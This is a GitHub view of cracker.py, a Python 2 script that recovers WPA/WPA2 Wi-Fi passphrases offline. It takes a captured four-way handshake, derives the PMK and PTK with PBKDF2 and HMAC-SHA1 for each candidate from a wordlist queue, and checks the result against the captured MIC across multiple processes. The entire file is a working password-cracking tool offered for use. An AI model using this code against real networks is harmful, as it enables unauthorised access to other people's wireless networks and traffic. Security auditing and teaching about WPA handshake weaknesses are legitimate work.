-
Notifications
You must be signed in to change notification settings - Fork 109
/
Copy pathcracker.py
60 lines (54 loc) · 1.95 KB
/
cracker.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
import hmac,hashlib,binascii
from hashlib import sha1
from binascii import a2b_hex, b2a_hex, unhexlify
from pbkdf2_ctypes import pbkdf2_bin
from datetime import datetime
from multiprocessing import Pool, Queue, cpu_count
from time import sleep
numOfPs = cpu_count()
def hmac4times(ptk, pke):
tempPke = pke
r = ''
for i in range(4):
r += hmac.new(ptk, pke + chr(i), sha1).digest()
return r
def crackProcess(ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue, foundPassQ):
pke = "Pairwise key expansion" + '\x00' + min(APMac,clientMac)+max(APMac,clientMac)+min(Anonce,Snonce)+max(Anonce,Snonce)
count = 0
timeA = datetime.now()
while True:
passPhrase = passQueue.get()
pmk = pbkdf2_bin(passPhrase, ssid, 4096, 32)
ptk = hmac4times(pmk,pke)
if ord(data[6]) & 0b00000010 == 2:
calculatedMic = hmac.new(ptk[0:16],data,sha1).digest()[0:16]
else:
calculatedMic = hmac.new(ptk[0:16],data).digest()
if mic == calculatedMic:
foundPassQ.put(passPhrase)
def crack(ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue):
foundPassQ = Queue()
try:
timeA = datetime.now()
startSize = passQueue.qsize()
except:
pass
pool = Pool(numOfPs, crackProcess, (ssid, clientMac, APMac, Anonce, Snonce, mic, data, passQueue, foundPassQ))
while True:
sleep(1)
try:
timeB = datetime.now()
currentSize = passQueue.qsize()
print str(100 - 100.0 * currentSize / startSize) + "% done. " + str((startSize - currentSize) / (timeB - timeA).total_seconds()) + " hashes per second"
except:
pass
if foundPassQ.empty():
if passQueue.empty():
returnVal = False
break
else:
passphrase = foundPassQ.get()
returnVal = passphrase
break
pool.terminate()
return returnVal